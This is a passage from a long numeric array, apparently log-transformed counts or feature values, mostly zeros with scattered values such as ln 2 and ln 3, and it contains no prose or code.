0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098,\n 3.2188758248682006, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 2.9444389791664403, 0, 0.0, 0.0, 0.0, 5.76977456331519, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.769774563315189, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 4.160336650881089, 0, \n 0.0, 0, 0, 0, 0.0, 4.825453896395787, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 4.174387269895637, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0, 0.0, 0.0, 0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 1.7412592803704001, 0.0, 0.0, 0.0, 3.713572066704308, 0.0, 0.0, 0, \n 1.3862943611198906, 0, 0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0, \n 0.0, 4.189654742026425, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 4.631631038266565, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 4.160336650881089, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 3.8918202981106265, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 3.258096538021482, 0.0, 0.0, 4.189654742026425, \n 1.791759469228055, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 5.723585101952381, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 5.545177444479562, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4339872044851467, \n 0.0, 0.0, 1.9459101490553132, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 0,\n 0.0, 2.0794415416798357, 4.852030263919617, 0, 0, 0, 0.0, 0.0, \n 3.0841946160253872, 0, 0.0, 0, 2.8398715690385097, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.182806904693496, 0.0, 4.1588830833596715, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 1.9459101490553132, 2.1972245773362196, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.991464547107983, 0.0,\n 0.0, 4.394449154672439, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 3.6109179126442243, 1.6094379124341003, 0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.248495242049359, 0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, \n 4.292158018817389, 0, 0.0, 1.791759469228055, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0, 1.6094379124341003, 0.0, 0.0, \n 3.4657359027997265, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 3.7369991058576035, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 3.9120230054281455, 5.46286043483228, 0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.4657359027997265, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 4.969813299576001, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 6.198469360840315, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 9.036526890435972, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 10.645964802870076, 0, \n 3.0910424533583156, 0, 4.394449154672439, 0, 0.0, 5.16396083649347, 0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0, 0.0, 3.0841946160253872, 0.0, 0.0, 0.0,\n 0.0, 3.2958368660043296, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.983606621708336, 5.723585101952381, 0.0,\n 0.0, 0.0, 1.3862943611198906, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0, 6.731743096669168, 0.0, 0.0, 0.0, \n 4.248495242049359, 2.302585092994046, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 10.484135188312967, 0.0, 0.0, 4.581130849408909, 0, 0, \n 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0, 0.0, \n 7.3777589082278725, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, \n 4.828313737302301, 0.0, 0, 3.8918202981106265, 0, 0, 0.0, 0.0, 0.0, \n 3.6375861597263857, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 4.110873864173311, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.6913478822291435, 0,\n 0.0, 0.0, 4.1588830833596715, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 2.70805020110221, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0, 0, 0.0, 0, 0.0, \n 4.748123315783209, 0.0, 2.8903717578961645, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0, 0.0, 0, 5.375278407684164, 0.0, 0, 0.0, 0.0, 0.0, \n 3.649511027115099, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 3.4657359027997265, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 3.9512437185814275, 0.0, 0, 3.178053830347946, \n 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0.0, 0.0, 2.9444389791664403, \n 0.0, 0.0, 0.0, 0, 5.262690188904886, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 2.8903717578961645, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 3.2958368660043296, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9957322735539913, 0, 0.0, 0.0, 0.0, \n 2.3978952727983707, 4.182806904693496, 0.0, 0.0, 5.541833368412345, 0, \n 0.0, 0.0, 0.0, 4.0943445622221, 0.0, 0.0, 2.772588722239781, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0,\n 0.0, 0.0, 2.6390573296152584, 0, 0.0, 0.0, 7.652696215340967, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.9459101490553132, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.784189633918261, 0, 0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 4.581130849408909, 0.0, 0.0, 0.0, \n 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0, 0, 2.302585092994046, 0.0,\n 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 4.06534854782536, 0, \n 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0, 0, 1.9459101490553132, 0, 0, 0, 0.0, 0.0, 0.0, 1.6094379124341003,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, \n 4.394449154672439, 0.0, 0.0, 0, 0.0, 5.101797476893978, 0.0, 0.0, 0.0, \n 0.0, 0, 4.160336650881089, 0.0, 0.0, 0, 1.791759469228055, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 18.10738653744207, 0.0, 0.0, 0.0, 0.0, \n 15.33168766477724, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, \n 7.783640596221253, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 8.49964003216865, 5.723585101952381, 16.710753060660316, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 3.1354942159291497, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 5.429345628954441, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.1298987149230735, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 5.030437921392435, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 2.1972245773362196, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 1.791759469228055, 0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 